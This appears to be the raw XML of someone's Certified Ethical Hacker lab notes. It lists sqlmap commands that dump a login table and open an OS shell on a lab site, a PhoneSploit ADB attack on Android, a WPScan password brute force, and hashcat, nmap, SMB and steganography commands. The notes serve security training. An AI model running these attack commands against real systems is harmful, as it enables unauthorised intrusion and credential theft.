    <w:p w14:paraId="40A9E2E8" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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--dbs: Enumerate DBMS databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072A23E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Get a list of databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6F4B2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 a database to extract its tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A63823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sqlmap -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00C525F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http://www.moviescope.com/viewprofile.aspx?id=1</w:t>
        </w:r>
      </w:hyperlink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" --cookie="value" -D moviescope –tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC490FF" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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-D: Specify the DBMS database to enumerate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB7142" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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--tables: Enumerate DBMS database tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0634DD1A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Get a list of tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512E60B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 a column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110054B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sqlmap -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00C525F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http://www.moviescope.com/viewprofile.aspx?id=1</w:t>
        </w:r>
      </w:hyperlink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" --cookie="value" -D moviescope –T User_Login --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7EB28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Get table data of this column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5405D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sqlmap -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00C525F5">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI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http://www.moviescope.com/viewprofile.aspx?id=1</w:t>
        </w:r>
      </w:hyperlink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" --cookie="value" --os-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2F9AA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Get the OS Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620CC57" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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TASKLIST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134C20CA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17: Hacking Mobile Platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A92B089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 1-Task 4: Exploit the Android Platform through ADB using PhoneSploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B58BB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Phonesploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D7B30F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python3 -m pip install colorama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD17F8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python3 phonesploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D76E8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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F179F1C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10.10.10.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583FE6B0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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681CEE6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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB02AD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sdcard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED29EBC" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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cd Download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31205DC0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20: Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B96538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Lab1-Task2: Calculate MD5 Hashes using MD5 Calculator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CE05A" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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Nothing special</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE7895A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Lab4-Task1: Perform Disk Encryption using VeraCrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8D256D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Click VeraCrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1A2FC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Volumn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143675F7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an encrypted file container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08584519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Specify a path and file name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F84AF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 password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1471F4AF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 NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C49F82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Move the mouse randomly for some seconds, and click Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28386E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Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E09DE0E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 a drive, select file, open, mount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B988FEF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Input password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D69D4A" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRP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Dismount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625CF513" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6613D215" w14:textId="041A1503" w:rsidR="00D80BE8" w:rsidRDefault="007B0E85" w:rsidP="00D80BE8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="30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7B0E8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Lab4-</w:t>
      </w:r>
      <w:r w:rsidR="00D80BE8" w:rsidRPr="007B0E85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Task 2: Perform Disk Encryption using BitLocker Drive Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7ACE74" w14:textId="3085D714" w:rsidR="00EA6357" w:rsidRPr="00570166" w:rsidRDefault="0090519F" w:rsidP="00570166">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="30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Manage BitLocker/ New volume/</w:t>
      </w:r>
      <w:r w:rsidR="0057016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Turn on BitLocker/</w:t>
      </w:r>
      <w:r w:rsidR="0084084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 xml:space="preserve"> check </w:t>
      </w:r>
      <w:r w:rsidR="00840848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Use a password to unlock the drive</w:t>
      </w:r>
      <w:r w:rsidR="0084084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1B4355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/input password/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2332C7E6" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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Module Appendix: Covered Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2B8EE7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Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181637A5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Multiple Labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27617502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Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D28CD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13: Lab2-Task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08710585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Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED7FC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15: Lab1-Task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4AF10C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WPScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020E1C6D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14: Lab2-Task5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72652483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wpscan –-url </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r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http://10.10.10.10</w:t>
        </w:r>
      </w:hyperlink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-t 50 -U admin -P rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D36A829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Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDECF6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4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https://zhuanlan.zhihu.com/p/124246499</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70D85874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John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C65819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06: Lab1-Task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722E7798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Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEEB1D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Crack MD5 passwords with a wordlist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007EC32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hashcat hash.txt -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A108BC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Crack MD5 passwords in a certain format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CE1886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hashcat -m 0 -a 3 ./hash.txt 'SKY-HQNT-?d?d?d?d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F8E82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5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https://xz.aliyun.com/t/4008</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="065AC771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6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https://tools.kali.org/password-attacks/hashcat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63A1EA57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Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A7FB36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14: Lab2-Task5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D227B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Responder LLMNR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180096B0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06: Lab1-Task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A194C8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Wireshark or Tcpdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D5BB5B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Multiple Labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081982F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Steghide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B7FBF3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Hide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B494795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steghide embed -cf [img file] -ef [file to be hide]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C0E36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steghide embed -cf 1.jpg -ef 1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C9FF23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password or skip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4DD387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Extract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB8DEF2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steghide info 1.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184DE254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steghide extract -sf 1.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF06004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Enter password if it does exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A07FCC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OpenStego</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3653A92D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7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https://www.openstego.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="428DE4AF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QuickStego</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588AF666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06: Lab0-Task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661B8550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Dirb (Web content scanner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D63B3C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8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https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c86</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DAB3939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9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https://blog.csdn.net/weixin_44912169/article/details/105655195</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CBF240A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Searchsploit (Exploit-DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD64F6E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0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https://www.hackingarticles.in/comprehensive-guide-on-searchsploit/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07B1E07E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Crunch (wordlist generator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFDF7B9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1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https://www.cnblogs.com/wpjamer/p/9913380.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="231545A8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Cewl (URL spider)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021E0285" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00000000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22" w:history="1">
        <w:r w:rsidR="00C525F5" w:rsidRPr="00C525F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https://www.freebuf.com/articles/network/190128.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54535C8A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Veracrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D120B2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20: Lab4-Task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841B82B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Hashcalc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4338E3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20: Lab1-Task1 (Nothing special)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EA528D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Rainbow Crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6DCF40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06: Lab0-Task0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B4B6E5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Windows SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D9579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smbclient -L [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5801307D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smbclient \ip\sharename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AE0AF2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nmap -p 445 -sV –script smb-enum-services [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE6B017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**Run Nmap at the beginning **</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE5BD0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nmap -sn -PR 192.168.1.1/24 -oN ip.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C152555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nmap -A -T4 -vv -iL ip.txt -oN nmap.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324627F0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nmap -sU -sV -A -T4 -v -oN udp.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4876F7E8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Snow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17115155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./snow -C -p "magic" output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E69D963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snow -C -m "Secret Text Goes Here!" -p "magic" readme.txt readme2.txt • -m → Set your message • -p → Set your password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC56497" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Rainbowcrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B09C1E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 Winrtgen to generate a rainbow table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A620BA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Launch RainbowCrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E650C6E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File-&gt;Load NTLM Hashes from PWDUMP File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059ADC37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Rainbow Table-&gt;Search Rainbow Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FECE06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 the generated rainbow table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A327DD1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RainbowCrack automatically starts to crack the hashes </w:t>
      </w:r>
      <w:r w:rsidRPr="00C525F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QuickStego</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E119943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Launch QuickStego</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74316D1D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 Image, and select target .jpg file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2733E035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 Text, and select a txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2D0FAC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Hide text, save image file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BEF8BA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Re-launch, Open Image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458B6BC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Select stego file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6728DB" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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525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Hidden text shows up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C47A9" w14:textId="77777777" w:rsidR="00727502" w:rsidRDefault="00727502"/>
    <w:sectPr w:rsidR="0072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87E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EF0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B69FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC0E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B3185"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01B4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6C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B41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C5097"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0F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2D81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC6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B411C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42C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31B7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62B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279AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A7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766E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F0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446F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCA8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22987"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBB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F7211"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9712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D3BDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="963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133F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E05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D029E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="234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57B38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE7C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A3A05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30D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E61C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B8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445038">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="453795207">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1096167819">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1843858285">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="97019822">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1060637332">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="325715217">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="114757243">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="735083428">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="610169340">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="493649125">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="864440170">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1730375343">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="2053378551">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1394352626">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="95945247">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="260919364">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2113351518">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="17489602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5"/>
    <w:rsid w:val="001B4355"/>
    <w:rsid w:val="00570166"/>
    <w:rsid w:val="00702EE8"/>
    <w:rsid w:val="00727502"/>
    <w:rsid w:val="007B0E85"/>
    <w:rsid w:val="007F4DC9"/>
    <w:rsid w:val="008148BF"/>
    <w:rsid w:val="00840848"/>
    <w:rsid w:val="0090519F"/>
    <w:rsid w:val="00C525F5"/>
    <w:rsid w:val="00D80BE8"/>
    <w:rsid w:val="00EA6357"/>
    <w:rsid w:val="00F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C24C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2339BCD5-BCE2-48C2-8055-3D4620B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25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25F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0BE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D8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.16:8080/CEH" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.10/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c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wpjamer/p/9913380.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/register" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescope.com/viewprofile.aspx?id=1" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.opensteg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kali.org/password-attacks/hashcat" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/comprehensive-guide-on-searchsplo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10.10.16:8080/CEH" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescope.com/viewprofile.aspx?id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oviescope.com/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xz.aliyun.com/t/400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oviescope.com/viewprofile.aspx?id=1" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/weixin_44912169/article/details/1056551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viescope.com/viewprofile.aspx?id=1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zhuanlan.zhihu.com/p/124246499%20" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/network/1901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1606</Words>
  <Characters>9159</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>76</Lines>
  <Paragraphs>21</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Flomo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Daniel Flomo</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-17T22:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-25T10:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>